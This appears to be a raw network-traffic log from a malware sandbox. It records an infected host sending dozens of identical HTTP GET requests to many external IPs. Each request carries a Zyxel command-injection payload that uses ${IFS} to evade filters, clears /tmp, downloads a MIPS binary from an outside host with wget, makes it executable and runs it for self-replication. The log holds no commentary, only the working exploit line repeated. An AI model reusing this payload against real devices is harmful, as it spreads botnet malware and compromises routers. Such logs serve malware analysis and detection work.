                                          Jan 14, 2024 15:46:11.879746914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3134192.168.2.2340640180.225.78.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879791021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3135192.168.2.233499295.69.48.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879815102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3136192.168.2.234235244.169.73.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879846096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3137192.168.2.233972867.135.233.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879875898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3138192.168.2.234480037.57.107.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879904032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3139192.168.2.2355806111.34.182.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879925966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3140192.168.2.234871631.30.99.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879937887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3141192.168.2.234590017.60.235.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.879977942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3142192.168.2.2345782129.190.176.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880019903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3143192.168.2.235722881.157.210.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880027056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3144192.168.2.234171694.25.142.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880031109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3145192.168.2.2347800154.33.228.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880053043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3146192.168.2.235579281.15.145.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880101919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3147192.168.2.235333836.250.162.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880112886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3148192.168.2.234298891.71.135.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880160093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3149192.168.2.234912260.27.226.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880167961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3150192.168.2.2337644200.112.148.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880187035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3151192.168.2.235707497.236.161.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880217075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3152192.168.2.2356318115.115.40.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880244970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3153192.168.2.2337314147.196.205.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880256891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3154192.168.2.235032671.25.120.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880278111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3155192.168.2.234090486.148.220.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880314112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3156192.168.2.234129412.234.196.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880326033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3157192.168.2.2344574152.61.249.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880362034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3158192.168.2.2333734202.140.33.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880393028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3159192.168.2.2346734101.110.116.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880422115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3160192.168.2.233318476.191.97.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880433083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3161192.168.2.235307668.229.45.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880460024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3162192.168.2.234763432.9.81.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880486965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3163192.168.2.2360948173.203.156.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880523920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3164192.168.2.2348534200.75.174.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880536079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3165192.168.2.233379667.48.252.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880568981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3166192.168.2.2350118168.72.176.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880601883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3167192.168.2.2359036152.235.39.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880614996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3168192.168.2.2348006216.62.160.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880651951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3169192.168.2.2350200159.155.237.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880655050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3170192.168.2.2333050170.175.186.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880702019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3171192.168.2.2339078221.232.40.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880753040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3172192.168.2.2337892185.254.130.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880753040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3173192.168.2.233343897.31.37.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880790949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3174192.168.2.2345818176.135.40.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880803108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3175192.168.2.234240685.211.61.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880824089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3176192.168.2.235087272.86.171.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880883932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3177192.168.2.2339196186.81.157.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880884886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3178192.168.2.236051845.22.183.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880892038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3179192.168.2.233426048.233.95.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880927086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3180192.168.2.234253238.41.82.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880960941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3181192.168.2.235181063.60.41.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880978107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3182192.168.2.2347166124.223.172.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.880987883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3183192.168.2.2334712104.226.235.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881021023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3184192.168.2.234982682.180.249.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881063938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3185192.168.2.234747097.165.108.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881100893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3186192.168.2.235200044.163.133.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881129980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3187192.168.2.234219627.59.79.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881166935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3188192.168.2.2351678125.40.207.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881321907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3189192.168.2.233913841.23.104.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881402016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3190192.168.2.2344110160.75.13.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881493092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3191192.168.2.236095866.96.194.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881634951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3192192.168.2.23577629.56.255.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881695032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3193192.168.2.235123665.220.28.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881812096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3194192.168.2.2336650143.73.220.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881921053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3195192.168.2.2333814207.136.171.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.881985903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3196192.168.2.235913870.114.245.190443
                                          TimestampBytes transferredDirectionData
